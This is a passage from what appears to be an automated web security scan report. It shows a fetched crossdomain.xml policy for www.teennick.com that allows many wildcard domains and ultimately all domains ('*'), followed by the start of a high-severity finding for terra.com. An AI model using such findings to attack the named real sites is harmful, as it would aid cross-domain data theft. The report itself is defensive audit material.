Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.teennick.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: W/"2563-1301085024000"
Last-Modified: Fri, 25 Mar 2011 20:30:24 GMT
Content-Length: 2563
Content-Type: text/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 14:18:01 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 20:18:01 GMT; path=/
Vary: User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.mtvi.com"/>
   <allow-access-from domain="*.nick.com"/>
   <allow-access-from domain="*.nickjr.com"/>
   <allow-access-from domain="*.nickjr-d.mtvi.com"/>
   <allow-access-from domain="*.nickjr-q.mtvi.com"/>
   <allow-access-from domain="*.nickonline.com"/>
   <allow-access-from domain="*.kids.nickonline.com"/>
   <allow-access-from domain="*.addictinggames.com"/>
   <allow-access-from domain="*.shockwave.com"/>    
   <allow-access-from domain="*.nickatnite.com"/>
   <allow-access-from domain="*.nickatnight.com"/>    
   <allow-access-from domain="*.magorium.com"/>    
   <allow-access-from domain="*.doubleclick*"/>
   <allow-access-from domain="*.the-n.com"/>
   <allow-access-from domain="*.theredspace.com"/>
   <allow-access-from domain="24.222.18.26"/>
   <allow-access-from domain="*.nicktoonsnetwork.com"/>
   <allow-access-from domain="*.mtvnservices.com"/>
   <allow-access-from domain="*.biggreenhelp.com"/>
   <allow-access-from domain="*.nick.co.kr"/>
   <allow-access-from domain="*.nicktv.it"/>
   <allow-access-from domain="*.popsicle.com"/>
   <allow-access-from domain="*.mtv.pl"/>
   <allow-access-from domain="96.10.20.67"/>    
   <allow-access-from domain="*.mua.nick-d.mtvi.com"/>
   <allow-access-from domain="*.mua.nick-q.mtvi.com"/>
   <allow-access-from domain="*.mua.nick.com"/>
   <allow-access-from domain="kca.gigya.s3.amazonaws.com"/>
   <allow-access-from domain="http://testing.arkadium.com"/>
...[SNIP]...
<allow-access-from domain="*.neopets.com"/>
   <allow-access-from domain="gamestudio.sarbakangames.com"/>
   <allow-access-from domain="*.scenic-d.mtvi.com/"/>
   <allow-access-from domain="*.scenic-q.mtvi.com/"/>
   <allow-access-from domain="*.scenic-l.mtvi.com/"/>
   <allow-access-from domain="live.toptrumps.com"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.127. http://www.terra.com/crossdomain.xml

Summary

Severity:   High